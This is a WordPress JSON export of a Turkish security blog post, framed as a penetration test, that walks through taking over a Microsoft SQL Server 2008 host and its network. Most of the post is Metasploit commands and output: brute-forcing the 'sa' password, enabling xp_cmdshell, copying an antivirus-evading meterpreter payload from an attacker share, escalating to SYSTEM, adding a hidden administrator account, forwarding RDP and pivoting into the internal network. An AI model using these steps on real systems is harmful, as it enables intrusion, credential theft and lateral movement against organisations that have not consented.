{"id":754,"date":"2016-08-17T13:18:30","date_gmt":"2016-08-17T10:18:30","guid":{"rendered":"https:\/\/multimediabilgisayar.com\/blog\/?p=754"},"modified":"2022-08-31T11:33:07","modified_gmt":"2022-08-31T08:33:07","slug":"mssql-uzerinden-xp_cmdshell-isletim-sistemini-networku-ele-gecirme","status":"publish","type":"post","link":"https:\/\/multimediabilgisayar.com\/blog\/mssql-uzerinden-xp_cmdshell-isletim-sistemini-networku-ele-gecirme\/","title":{"rendered":"MSSQL \u00dczerinden (xp_cmdshell) \u0130\u015fletim Sistemini ve Network\u00fc Ele Ge\u00e7irme"},"content":{"rendered":"<p>Pantest \u00e7al\u0131\u015fmalar\u0131n\u0131n amac\u0131 hedef sistemi en y\u00fcksek kullan\u0131c\u0131 yetkileri ile ele ge\u00e7irmek ve hedef sistem \u00fczerinde ilerlemektir. Farkedilen en k\u00fc\u00e7\u00fck zaafiyet bile, \u00f6nemli bulgular elde etmeye yarayabilir. Bu yaz\u0131da da bir pantest \u00e7al\u0131\u015fmas\u0131yla kazan\u0131lan tecr\u00fcbeler anlat\u0131l\u0131yor.<\/p>\n<p>Bu arada, sistemleri internete a\u00e7\u0131k ve g\u00fcvenlik anlam\u0131nda politikalara sahip olmayan firmalardan, sald\u0131rganlar\u0131n ele ge\u00e7irdikleri \u015firket i\u00e7i \u00f6zel verilerini r\u00fc\u015fvet ve \u015fantaj amac\u0131 ile kulland\u0131klar\u0131 ile ilgili haberler s\u0131k s\u0131k bas\u0131nda yer almakta.<\/p>\n<p><strong>Mssql Servisinin Belirlenmesi:<\/strong><br \/>\n<code># sudo nmap -sT -sV 9.1.1.1 -p 1433 -PN<\/code><\/p>\n<p>Starting Nmap 5.21 ( http:\/\/nmap.org ) at 2012-01-29 21:53 EET<\/p>\n<p>Nmap scan report for 9.1.1.1.dynamic.ttnet.com.tr (9.1.1.1)<br \/>\nHost is up (0.027s latency).<br \/>\n<strong>PORT STATE SERVICE VERSION<\/strong><br \/>\n<strong>1433\/tcp open ms-sql-s Microsoft SQL Server 2008<\/strong><br \/>\nHedef sistemde Microsoft SQL Server 2008 servisi \u00e7al\u0131\u015fmakta.<\/p>\n<p>Mssql sunucularda en yetkili kullan\u0131c\u0131 &#8220;sa&#8221; kullan\u0131c\u0131s\u0131d\u0131r. Bu hesap ile, mssql server en y\u00fcksek yetkiler ile y\u00f6netilebilir.<\/p>\n<p><strong>&#8220;sa&#8221; hesab\u0131na y\u00f6nelik brute force denemesi<\/strong><\/p>\n<p>Hedef sistemde, Mssql 2008 \u00e7al\u0131\u015fmakta ve &#8220;sa&#8221; kullan\u0131c\u0131 hesab\u0131 ile kimlik do\u011frulama yap\u0131labilmektedir.<\/p>\n<p><strong>Brute force ile parola deneme sald\u0131r\u0131s\u0131:<\/strong><br \/>\n<code>#msfconsole<\/code><\/p>\n<p>msf &gt; use auxiliary\/scanner\/mssql\/mssql_login<\/p>\n<p>msf auxiliary(mssql_login) &gt; set RHOSTS 9.1.1.1<br \/>\nRHOSTS =&gt; 9.1.1.1<\/p>\n<p>msf auxiliary(mssql_login) &gt; set USERPASS_FILE \/home\/ozanus\/pass.lst<br \/>\nUSERPASS_FILE =&gt; \/home\/ozanus\/pass.lst<\/p>\n<p>msf \u00a0auxiliary(mssql_login) &gt; exploit<\/p>\n<p>[*] 9.1.1.1:1433 MSSQL \u2013 [01\/13] \u2013 Trying username:\u2019sa\u2019 with password:\u201d<br \/>\n[-] 9.1.1.1:1433 MSSQL \u2013 [01\/13] \u2013 failed to login as \u2018sa\u2019<br \/>\n\u2026<br \/>\n\u2026<br \/>\n[+] 9.1.1.1:1433 \u2013 MSSQL \u2013 successful login \u2018sa\u2019 : \u2018benimgizliparolam\u2018,<br \/>\n[*] Scanned 1 of 1 hosts (100% complete)<br \/>\n[*] Auxiliary module execution completed<br \/>\nParola deneme sald\u0131r\u0131lar\u0131na kar\u015f\u0131 bir g\u00fcvenlik politikas\u0131 yoksa, brute force sald\u0131r\u0131s\u0131 ile ba\u015far\u0131l\u0131 sonu\u00e7 al\u0131nabilir, parola elde edilebilir.<\/p>\n<p><strong>Mssql&#8217;den bilgi toplama:<\/strong><\/p>\n<p>Mssql sunucusundan veritaban\u0131 tablo yap\u0131s\u0131, konfigrasyon parametreleri, veritaban\u0131 kullan\u0131c\u0131lar\u0131, mssql&#8217;e login olmu\u015f kullan\u0131c\u0131 hesaplar\u0131 ve mssql sunucunun \u00e7al\u0131\u015ft\u0131\u011f\u0131 i\u015fletim sistemindeki kullan\u0131c\u0131 hesaplar\u0131 ve buna benzer bilgiler toplanabilir.<br \/>\n<code>msf &gt; use auxiliary\/admin\/mssql\/mssql_enum<br \/>\nmsf auxiliary(mssql_enum) &gt; set RHOST 9.1.1.1<br \/>\nRHOST =&gt; 9.1.1.1<br \/>\nmsf auxiliary(mssql_enum) &gt; set PASSWORD benimgizliparolam<br \/>\nPASSWORD =&gt; benimgizliparolam<br \/>\nmsf auxiliary(mssql_enum) &gt; exploit<\/code><\/p>\n<p>[+] [2012.01.25-15:00:50] Workspace:hedeffirma Progress:1\/2 (50%) Probing 9.1.1.1<br \/>\n[*] [2012.01.25-15:00:50] Running MS SQL Server Enumeration\u2026<br \/>\n[*] [2012.01.25-15:00:50] Version:<br \/>\n[*] Microsoft SQL Server 2008 R2 (SP1) \u2013 10.50.2500.0 (X64)<br \/>\n[*] Jun 17 2011 00:54:03<br \/>\n[*] Copyright (c) Microsoft Corporation<br \/>\n[*] Standard Edition (64-bit) on Windows NT 6.0 &lt;X64&gt; (Build 6002: Service Pack 2)<br \/>\n[*] [2012.01.25-15:00:50] Configuration Parameters:<br \/>\n[*] [2012.01.25-15:00:50] C2 Audit Mode is Not Enabled<br \/>\n[*] [2012.01.25-15:00:50] xp_cmdshell is Enabled<br \/>\n[*] [2012.01.25-15:00:50] remote access is Enabled<br \/>\n[*] [2012.01.25-15:00:50] allow updates is Not Enabled<br \/>\n[*] [2012.01.25-15:00:50] Database Mail XPs is Not Enabled<br \/>\n[*] [2012.01.25-15:00:50] Ole Automation Procedures are Not Enabled<br \/>\n[*] [2012.01.25-15:00:50] Databases on the server:<br \/>\n[*] [2012.01.25-15:00:50] Database name:Bga1989<br \/>\n[*] [2012.01.25-15:00:50] Database Files for Bga1989:<br \/>\n[*] [2012.01.25-15:00:51] Z:\\SQL\\MSSQL\\Data\\Bga1989_Data.mdf<br \/>\n[*] [2012.01.25-15:00:51] Z:\\SQL\\MSSQL\\Data\\Bga1989_log.ldf<br \/>\n[*] [2012.01.25-15:00:51] Database name:XYZ_1989<br \/>\n[*] [2012.01.25-15:00:51] Database Files for XYZ_1989:<br \/>\n[*] [2012.01.25-15:00:51] Database name:XYZ_07<br \/>\n[*] [2012.01.25-15:00:51] Database Files for XYZ_07:<br \/>\n[*] [2012.01.25-15:00:51] Database name:XYZ_BGA<br \/>\n[*] [2012.01.25-15:00:51] Database Files for XYZ_BGA:<br \/>\n[*] [2012.01.25-15:00:51] Z:\\XYZ_DB\\abcVERILER\\XYZ_BGA\\XYZ_BGA.mdf<br \/>\n[*] [2012.01.25-15:00:51] Z:\\XYZ_DB\\abcVERILER\\XYZ_BGA\\XYZ_BGA.ldf<br \/>\n[*] [2012.01.25-15:00:55] System Logins on this Server:<br \/>\n[*] [2012.01.25-15:00:56] sa<br \/>\n[*] [2012.01.25-15:00:56] ##MS_SQLResourceSigningCertificate##<br \/>\n[*] [2012.01.25-15:00:56] ##MS_SQLReplicationSigningCertificate##<br \/>\n[*] [2012.01.25-15:00:56] ##MS_SQLAuthenticatorCertificate##<br \/>\n[*] [2012.01.25-15:00:56] ##MS_PolicySigningCertificate##<br \/>\n[*] [2012.01.25-15:00:56] ##MS_SmoExtendedSigningCertificate##<br \/>\n[*] [2012.01.25-15:00:56] ##MS_PolicyTsqlExecutionLogin##<br \/>\n[*] [2012.01.25-15:00:56] NT AUTHORITY\\SYSTEM<br \/>\n[*] [2012.01.25-15:00:56] NT SERVICE\\MSSQLSERVER<br \/>\n[*] [2012.01.25-15:00:56] HEDEFFIRMA\\administrator<br \/>\n[*] [2012.01.25-15:00:56] NT SERVICE\\SQLSERVERAGENT<br \/>\n[*] [2012.01.25-15:00:56]<br \/>\n[*] [2012.01.25-15:00:56] ##MS_PolicyEventProcessingLogin##<br \/>\n[*] [2012.01.25-15:00:56] ##MS_AgentSigningCertificate##<br \/>\n[*] [2012.01.25-15:00:56] Disabled Accounts:<br \/>\n[*] [2012.01.25-15:00:56] ##MS_PolicyTsqlExecutionLogin##<br \/>\n[*] [2012.01.25-15:00:56] ##MS_PolicyEventProcessingLogin##<br \/>\n[*] [2012.01.25-15:00:56] No Accounts Policy is set for:<br \/>\n[*] [2012.01.25-15:00:56] sa<br \/>\n[*] [2012.01.25-15:00:56] Password Expiration is not checked for:<br \/>\n[*] [2012.01.25-15:00:56] sa<br \/>\n[*] [2012.01.25-15:00:56] ##MS_PolicyTsqlExecutionLogin##<br \/>\n[*] [2012.01.25-15:00:56] ##MS_PolicyEventProcessingLogin##<br \/>\n[*] [2012.01.25-15:00:56] System Admin Logins on this Server:<br \/>\n[*] [2012.01.25-15:00:56] sa<br \/>\n[*] [2012.01.25-15:00:56] NT AUTHORITY\\SYSTEM<br \/>\n[*] [2012.01.25-15:00:56] NT SERVICE\\MSSQLSERVER<br \/>\n[*] [2012.01.25-15:00:56] HEDEFFIRMA\\administrator<br \/>\n[*] [2012.01.25-15:00:56] NT SERVICE\\SQLSERVERAGENT<br \/>\n[*] [2012.01.25-15:00:56] Windows Logins on this Server:<br \/>\n[*] [2012.01.25-15:00:56] NT AUTHORITY\\SYSTEM<br \/>\n[*] [2012.01.25-15:00:56] HEDEFFIRMA\\administrator<br \/>\n[*] [2012.01.25-15:00:56] Windows Groups that can logins on this Server:<br \/>\n[*] [2012.01.25-15:00:56] NT SERVICE\\MSSQLSERVER<br \/>\n[*] [2012.01.25-15:00:56] NT SERVICE\\SQLSERVERAGENT<br \/>\n[*] [2012.01.25-15:00:56] Accounts with Username and Password being the same:<br \/>\n[*] [2012.01.25-15:00:56] No Account with its password being the same as its username was found.<br \/>\n[*] [2012.01.25-15:00:56] Accounts with empty password:<br \/>\n[*] [2012.01.25-15:00:56] No Accounts with empty passwords where found.<br \/>\n[*] [2012.01.25-15:01:02] Stored Procedures with Public Execute Permission found:<br \/>\n[*] [2012.01.25-15:01:02] sp_replsetsyncstatus<br \/>\n[*] [2012.01.25-15:01:02] sp_replcounters<br \/>\n[*] [2012.01.25-15:01:02] sp_replsendtoqueue<br \/>\n[*] [2012.01.25-15:01:02] sp_resyncexecutesql<br \/>\n[*] [2012.01.25-15:01:02] sp_prepexecrpc<br \/>\n[*] [2012.01.25-15:01:02] sp_repltrans<br \/>\n[*] [2012.01.25-15:01:02] sp_xml_preparedocument<br \/>\n[*] [2012.01.25-15:01:02] xp_qv<br \/>\n[*] [2012.01.25-15:01:02] xp_getnetname<br \/>\n[*] [2012.01.25-15:01:02] sp_releaseschemalock<br \/>\n[*] [2012.01.25-15:01:02] sp_refreshview<br \/>\n[*] [2012.01.25-15:01:02] sp_replcmds<br \/>\n[*] [2012.01.25-15:01:02] sp_unprepare<br \/>\n[*] [2012.01.25-15:01:02] sp_resyncprepare<br \/>\n[*] [2012.01.25-15:01:02] sp_createorphan<br \/>\n[*] [2012.01.25-15:01:02] xp_dirtree<br \/>\n[*] [2012.01.25-15:01:02] sp_replwritetovarbin<br \/>\n[*] [2012.01.25-15:01:02] sp_replsetoriginator<br \/>\n[*] [2012.01.25-15:01:02] sp_xml_removedocument<br \/>\n[*] [2012.01.25-15:01:02] sp_repldone<br \/>\n[*] [2012.01.25-15:01:02] sp_reset_connection<br \/>\n[*] [2012.01.25-15:01:02] xp_fileexist<br \/>\n[*] [2012.01.25-15:01:02] xp_fixeddrives<br \/>\n[*] [2012.01.25-15:01:02] sp_getschemalock<br \/>\n[*] [2012.01.25-15:01:02] sp_prepexec<br \/>\n[*] [2012.01.25-15:01:02] xp_revokelogin<br \/>\n[*] [2012.01.25-15:01:02] sp_resyncuniquetable<br \/>\n[*] [2012.01.25-15:01:02] sp_replflush<br \/>\n[*] [2012.01.25-15:01:02] sp_resyncexecute<br \/>\n[*] [2012.01.25-15:01:02] xp_grantlogin<br \/>\n[*] [2012.01.25-15:01:02] sp_droporphans<br \/>\n[*] [2012.01.25-15:01:02] xp_regread<br \/>\n[*] [2012.01.25-15:01:02] sp_getbindtoken<br \/>\n[*] [2012.01.25-15:01:02] sp_replincrementlsn<br \/>\n[*] [2012.01.25-15:01:02] Instances found on this server:<br \/>\n[*] [2012.01.25-15:01:02] MSSQLSERVER<br \/>\n[*] [2012.01.25-15:01:03] Default Server Instance SQL Server Service is running under the privilege of:<br \/>\n[*] [2012.01.25-15:01:03] HEDEFFIRMA\\administrator<br \/>\n[+] [2012.01.25-15:01:03] Workspace:hedeffirma Progress:2\/2 (100%) Complete (0 sessions opened) auxiliary\/admin\/mssql\/mssql_enum<\/p>\n<p><strong>Mssql xp_cmdshell ve aktif edilmesi:<\/strong><\/p>\n<p>xp_cmdshell, i\u015fletim sisteminde komut \u00e7al\u0131\u015ft\u0131rmak i\u00e7in kullan\u0131lan bir \u00f6zelliktir. Kontrol\u00fcn\u00fc ele ge\u00e7irdi\u011fimiz mssql server, Windows 2008 sunucu \u00fczerinde Administrator yetkileri ile \u00e7al\u0131\u015fmaktad\u0131r. Yetenekli ajan\u0131m\u0131z &#8220;meterpreter&#8221; payload&#8217;\u0131n\u0131 kar\u015f\u0131 tarafa y\u00fckleyip \u00e7al\u0131\u015ft\u0131rmay\u0131 ba\u015fard\u0131\u011f\u0131m\u0131z taktirde i\u015fletim sistemini ele ge\u00e7irebiliriz. Bu i\u015fletim sistemi \u00fczerinden firman\u0131n yerel a\u011f\u0131na ve dmz b\u00f6lgesindeki b\u00fct\u00fcn bilgisayarlara sald\u0131r\u0131 yapabiliriz.<\/p>\n<p>Hedef sistemde komut \u00e7al\u0131\u015ft\u0131rmak i\u00e7in mssql xp_cmdshell \u00f6zelli\u011fini aktif ediyoruz. Bu i\u015flem i\u00e7in, mssql 2008 manager kullanarak hedef sisteme ba\u011flan\u0131p a\u015fa\u011f\u0131daki sorgular\u0131 \u00e7al\u0131\u015ft\u0131rmak yetiyor;<br \/>\n<code>EXEC sp_configure \u2018show advanced options\u2019, 1<br \/>\nGO<br \/>\nRECONFIGURE<br \/>\nGO<br \/>\nEXEC sp_configure \u2018xp_cmdshell\u2019, 1<br \/>\nGO<br \/>\nRECONFIGURE<br \/>\nGO<\/code><br \/>\n<strong>xp_cmdshell ile komut \u00e7al\u0131\u015ft\u0131rmak:<\/strong><\/p>\n<p>Bu i\u015flem i\u00e7in metasploit &#8220;mssql_exec&#8221; yard\u0131mc\u0131 arac\u0131n\u0131 kullanabiliriz. Peki, hedef sistemde cmd.exe ile ne yapabiliriz ve cmd.exe ile uzak sistemden dosya \u00e7ekip nas\u0131l \u00e7al\u0131\u015ft\u0131rabiliriz?<\/p>\n<p>Bunun i\u00e7in birden fazla &#8220;post explotion&#8221; tekni\u011fi mevcuttur. Hedef sistemde sahip oldu\u011fumuz kullan\u0131c\u0131 yetkileri, hedef i\u015fletim sisteminde kurulu yaz\u0131l\u0131mlar ve i\u015fletim sisteminin internet&#8217;e eri\u015fim kurabilece\u011fi portlara g\u00f6re farkl\u0131 teknikler geli\u015ftirilmi\u015ftir. Bu i\u015flem i\u00e7in pratik olarak kullan\u0131lak teknik ise, kendi windows sisteminizin payla\u015f\u0131m\u0131na ba\u011flan\u0131p buradan meterpreter ajan\u0131n\u0131 i\u015fletim sistemine kopyalamakt\u0131r.<br \/>\n<code># msfconsole<\/code><\/p>\n<p>use auxiliary\/admin\/mssql\/mssql_exec<br \/>\nmsf \u00a0auxiliary(mssql_exec) &gt;\u00a0set CMD \u2018cmd.exe \/c net use o: \/USER:Administrator \\\\88.1.1.188\\c$ parola\u2019<br \/>\nCMD =&gt; cmd.exe \/c net use o: \/USER:Administrator \\\\88.1.1.188\\c$ parola<br \/>\nmsf \u00a0auxiliary(mssql_exec) &gt;\u00a0exploit<br \/>\nE\u011fer komut \u00e7al\u0131\u015ft\u0131ysa, diski map edebilmi\u015f miyiz kontrol edelim:<br \/>\n<code>msf auxiliary(mssql_exec) &gt;\u00a0set CMD \u2018cmd.exe \/c net use\u2019<br \/>\nCMD =&gt; cmd.exe \/c net use<br \/>\nmsf auxiliary(mssql_exec) &gt; exploit<br \/>\n[*] SQL Query: EXEC master..xp_cmdshell \u2018cmd.exe \/c net use\u2019<\/code><\/p>\n<p>output<\/p>\n<p>\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014-<\/p>\n<p>New connections will be remembered.<br \/>\nOK <strong>O: \\\\88.1.1.188\\c$ Microsoft Windows Network<\/strong><br \/>\nStatus Local Remote Network<br \/>\nThe command completed successfully.<br \/>\nUnavailable R: \\\\1.1.0.198\\dosyasunucu Microsoft Windows Network<br \/>\nUnavailable Z: \\\\1.1.0.202\\d$ Microsoft Windows Network<br \/>\nEvet, diski O:\\ s\u00fcr\u00fcc\u00fc ad\u0131 olarak hedef sisteme map ettik. \u015eimdi buradaki casus yaz\u0131l\u0131m\u0131 sisteme kopyalay\u0131p \u00e7al\u0131\u015ft\u0131ral\u0131m. Bu \u00e7al\u0131\u015fmada, hedef sistemde Endpoint Security yaz\u0131l\u0131m\u0131 \u00e7al\u0131\u015fmaktad\u0131r. Meterpeter antivir\u00fcs ve content filter sistemlere kar\u015f\u0131 encode edilerek tamamen tan\u0131nma hale getirilmi\u015ftir.<br \/>\n<code>msf auxiliary(mssql_exec) &gt; set CMD \u2018cmd.exe \/c copy o:\\80.exe C:\\80.exe\u2019<br \/>\nCMD =&gt; cmd.exe \/c copy o:\\80.exe C:\\80.exe<br \/>\nmsf auxiliary(mssql_exec) &gt; exploit<\/p>\n<p>[*] SQL Query: EXEC master..xp_cmdshell \u2018cmd.exe \/c copy o:\\80.exe C:\\80.exe\u2019<\/p>\n<p>output<br \/>\n\u2014\u2014<\/p>\n<p>1 file(s) copied.<\/p>\n<p>[*] Auxiliary module execution completed<br \/>\nListeleyelim, 80.exe ismi ile dosyam\u0131z hedef sistemde mi ?<br \/>\n<code>msf auxiliary(mssql_exec) &gt; set CMD \u2018cmd.exe \/c dir C:\\80.exe\u2019<br \/>\nmsf auxiliary(mssql_exec) &gt; exploit<\/code><\/p>\n<p>[*] SQL Query: EXEC master..xp_cmdshell \u2018cmd.exe \/c dir C:\\80.exe\u2019<\/p>\n<p>output<\/p>\n<p>\u2014\u2014<\/p>\n<p>0 Dir(s) 35,842,772,992 bytes free<\/p>\n<p>1 File(s) 112,399 bytes<br \/>\nDirectory of C:\\<br \/>\nVolume Serial Number is<br \/>\nVolume in drive C has no label.<br \/>\n25.01.2012 20:21 112,399 80.exe<\/p>\n<p>[*] Auxiliary module execution completed<\/code><br \/>\nEvet, dosyam\u0131z hedef sunucuya kopyalanm\u0131\u015f. 80.exe \u00e7al\u0131\u015ft\u0131rd\u0131\u011f\u0131m\u0131zda \u00a0meterpreter reverse connection kurarak sistemi emrimize sunacakt\u0131r.<\/p>\n<p><strong>Post Exploition Teknikleri<\/strong><\/p>\n<p>Meterpreter ile eri\u015fim elde ettikden sonra yapacaklar\u0131n\u0131z\u0131n pek s\u0131n\u0131r\u0131 yok, yetkili bir kullan\u0131c\u0131 haklar\u0131na sahip de\u011filsek local privilege\u00a0escalation tekniklerini kullanarak yetki y\u00fckseltebiliriz.<br \/>\n<code>meterpreter &gt; getsystem<br \/>\n\u2026got system (via technique 1)<\/code><\/p>\n<p>meterpreter &gt; getuid<br \/>\nServer username: NT AUTHORITY\\SYSTEM<br \/>\n1. teknikde ba\u015far\u0131l\u0131 oldu ve art\u0131k SYSTEM yetkiler ile hedef sistemde \u00e7al\u0131\u015fabiliriz.<\/p>\n<p>Bu a\u015famadan sonra, sisteme admin haklar\u0131na sahip bir kullan\u0131c\u0131 ekleyip uzak masa\u00fcst\u00fc ile ba\u011flant\u0131 kurmak<\/p>\n<p><strong>Windows komut sat\u0131r\u0131na ge\u00e7i\u015f ve kullan\u0131c\u0131 hesab\u0131 eklemek.<\/strong><br \/>\n<code>meterpreter &gt; shell<br \/>\nProcess 6364 created.<br \/>\nChannel 1 created.<br \/>\nMicrosoft Windows [Version 6.0.6002]<br \/>\nCopyright (c) 2006 Microsoft Corporation. All rights reserved.<\/code><\/p>\n<p>C:\\Windows\\system32&gt;net user bga P!ssw0rd \/add<br \/>\nnet user bga P!ssw0rd \/add<br \/>\nThe command completed successfully.<br \/>\nC:\\Windows\\system32&gt;net localgroup Administrators bga \/add<br \/>\nnet localgroup Administrators bga \/add<br \/>\nThe command completed successfully.<br \/>\n<strong>Port forwarding ile uzak masa\u00fcst\u00fc eri\u015fimi kurmak<\/strong><br \/>\nMeterpreter\u2019in portfwd \u00f6zelli\u011fi ile, kendi sisteminizdeki bir portu kurban sisteme bind edebilirsiniz.A\u015fa\u011f\u0131daki \u00f6rnekde, sald\u0131r\u0131 yapan 88.1.1.188 ip adresinin \u00a03389 portuna gelen istekler, hedef sistemin 3389 portuna y\u00f6nlendirilmi\u015ftir.<br \/>\n<code>meterpreter &gt; portfwd add -l 3389 -p 3389 -r 1.1.1.111<br \/>\n[*] Local TCP relay created: 0.0.0.0:3389 &lt;-&gt; 1.1.1.111:3389<\/code><br \/>\nBa\u011flant\u0131 i\u00e7in,<br \/>\n<code>#\u00a0rdesktop 88.1.1.188 -k tr -u bga<\/code><br \/>\nUzak sistemin bulundu\u011fu network\u2019deki di\u011fer ip adreslerine eri\u015fmek i\u00e7in meterpreter\u2019in route \u00f6zelli\u011fi kullan\u0131labilir. Metasploit hedef sistemi kullanarak di\u011fer sunuculara eri\u015fim kurabilir.<br \/>\n<code>meterpreter &gt;\u00a0route add 1.1.1.0 255.255.255.0 3<\/code><br \/>\nBu a\u015famadan sonra, metasploit auxiliary ve exploit\u2019lerini uzak sisteme uygulayabilirsiniz.<\/p>\n<p>&nbsp;<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Pantest \u00e7al\u0131\u015fmalar\u0131n\u0131n amac\u0131 hedef sistemi en y\u00fcksek kullan\u0131c\u0131 yetkileri ile ele ge\u00e7irmek ve hedef sistem \u00fczerinde ilerlemektir. Farkedilen en k\u00fc\u00e7\u00fck zaafiyet bile, \u00f6nemli bulgular elde etmeye yarayabilir. Bu yaz\u0131da da bir pantest \u00e7al\u0131\u015fmas\u0131yla kazan\u0131lan tecr\u00fcbeler anlat\u0131l\u0131yor. Bu arada, sistemleri internete a\u00e7\u0131k ve g\u00fcvenlik anlam\u0131nda politikalara sahip olmayan firmalardan, sald\u0131rganlar\u0131n ele ge\u00e7irdikleri \u015firket i\u00e7i \u00f6zel verilerini [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":2432,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[131,199],"tags":[223,224,225,226,227,228,229,230,231,232,233],"class_list":["post-754","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-guvenlik","category-siber-guvenlik","tag-brute-force-mssql","tag-microsoft-server","tag-microsoft-sql-server-2008","tag-msfconsole","tag-mssql","tag-mssql-guvenligi","tag-mssql-saldiri-yapmak","tag-mssql-server","tag-shell-atmak","tag-sql-komut-calistirma","tag-xp_cmdshell"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.1.1 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>MSSQL \u00dczerinden (xp_cmdshell) \u0130\u015fletim Sistemini ve Network\u00fc Ele Ge\u00e7irme - Multimedia Bilgisayar | Blog<\/title>\n<meta name=\"description\" content=\"Pantest \u00e7al\u0131\u015fmalar\u0131n\u0131n amac\u0131 hedef sistemi en y\u00fcksek kullan\u0131c\u0131 yetkileri ile ele ge\u00e7irmek ve hedef sistem \u00fczerinde ilerlemektir. En k\u00fc\u00e7\u00fck zaafiyet..\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/multimediabilgisayar.com\/blog\/mssql-uzerinden-xp_cmdshell-isletim-sistemini-networku-ele-gecirme\/\" \/>\n<meta property=\"og:locale\" content=\"tr_TR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"MSSQL \u00dczerinden (xp_cmdshell) \u0130\u015fletim Sistemini ve Network\u00fc Ele Ge\u00e7irme - Multimedia Bilgisayar | Blog\" \/>\n<meta property=\"og:description\" content=\"Pantest \u00e7al\u0131\u015fmalar\u0131n\u0131n amac\u0131 hedef sistemi en y\u00fcksek kullan\u0131c\u0131 yetkileri ile ele ge\u00e7irmek ve hedef sistem \u00fczerinde ilerlemektir. En k\u00fc\u00e7\u00fck zaafiyet..\" \/>\n<meta property=\"og:url\" content=\"https:\/\/multimediabilgisayar.com\/blog\/mssql-uzerinden-xp_cmdshell-isletim-sistemini-networku-ele-gecirme\/\" \/>\n<meta property=\"og:site_name\" content=\"Multimedia Bilgisayar | Blog\" \/>\n<meta property=\"article:published_time\" content=\"2016-08-17T10:18:30+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2022-08-31T08:33:07+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/multimediabilgisayar.com\/blog\/wp-content\/uploads\/2016\/08\/mssql_networks.png\" \/>\n\t<meta property=\"og:image:width\" content=\"734\" \/>\n\t<meta property=\"og:image:height\" content=\"419\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"Multimedia\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Yazan:\" \/>\n\t<meta name=\"twitter:data1\" content=\"Multimedia\" \/>\n\t<meta name=\"twitter:label2\" content=\"Tahmini okuma s\u00fcresi\" \/>\n\t<meta name=\"twitter:data2\" content=\"9 dakika\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/multimediabilgisayar.com\/blog\/mssql-uzerinden-xp_cmdshell-isletim-sistemini-networku-ele-gecirme\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/multimediabilgisayar.com\/blog\/mssql-uzerinden-xp_cmdshell-isletim-sistemini-networku-ele-gecirme\/\"},\"author\":{\"name\":\"Multimedia\",\"@id\":\"https:\/\/multimediabilgisayar.com\/blog\/#\/schema\/person\/75acd01e1e2de1d9d7b9c18ecfd81c90\"},\"headline\":\"MSSQL \u00dczerinden (xp_cmdshell) \u0130\u015fletim Sistemini ve Network\u00fc Ele Ge\u00e7irme\",\"datePublished\":\"2016-08-17T10:18:30+00:00\",\"dateModified\":\"2022-08-31T08:33:07+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/multimediabilgisayar.com\/blog\/mssql-uzerinden-xp_cmdshell-isletim-sistemini-networku-ele-gecirme\/\"},\"wordCount\":1467,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/multimediabilgisayar.com\/blog\/#organization\"},\"image\":{\"@id\":\"https:\/\/multimediabilgisayar.com\/blog\/mssql-uzerinden-xp_cmdshell-isletim-sistemini-networku-ele-gecirme\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/multimediabilgisayar.com\/blog\/wp-content\/uploads\/2016\/08\/mssql_networks.png\",\"keywords\":[\"brute force mssql\",\"microsoft server\",\"microsoft sql server 2008\",\"msfconsole\",\"mssql\",\"mssql g\u00fcvenli\u011fi\",\"mssql sald\u0131r\u0131 yapmak\",\"mssql server\",\"shell atmak\",\"sql komut \u00e7al\u0131\u015ft\u0131rma\",\"xp_cmdshell\"],\"articleSection\":[\"G\u00fcvenlik\",\"Siber G\u00fcvenlik\"],\"inLanguage\":\"tr\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/multimediabilgisayar.com\/blog\/mssql-uzerinden-xp_cmdshell-isletim-sistemini-networku-ele-gecirme\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/multimediabilgisayar.com\/blog\/mssql-uzerinden-xp_cmdshell-isletim-sistemini-networku-ele-gecirme\/\",\"url\":\"https:\/\/multimediabilgisayar.com\/blog\/mssql-uzerinden-xp_cmdshell-isletim-sistemini-networku-ele-gecirme\/\",\"name\":\"MSSQL \u00dczerinden (xp_cmdshell) \u0130\u015fletim Sistemini ve Network\u00fc Ele Ge\u00e7irme - Multimedia Bilgisayar | Blog\",\"isPartOf\":{\"@id\":\"https:\/\/multimediabilgisayar.com\/blog\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/multimediabilgisayar.com\/blog\/mssql-uzerinden-xp_cmdshell-isletim-sistemini-networku-ele-gecirme\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/multimediabilgisayar.com\/blog\/mssql-uzerinden-xp_cmdshell-isletim-sistemini-networku-ele-gecirme\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/multimediabilgisayar.com\/blog\/wp-content\/uploads\/2016\/08\/mssql_networks.png\",\"datePublished\":\"2016-08-17T10:18:30+00:00\",\"dateModified\":\"2022-08-31T08:33:07+00:00\",\"description\":\"Pantest \u00e7al\u0131\u015fmalar\u0131n\u0131n amac\u0131 hedef sistemi en y\u00fcksek kullan\u0131c\u0131 yetkileri ile ele 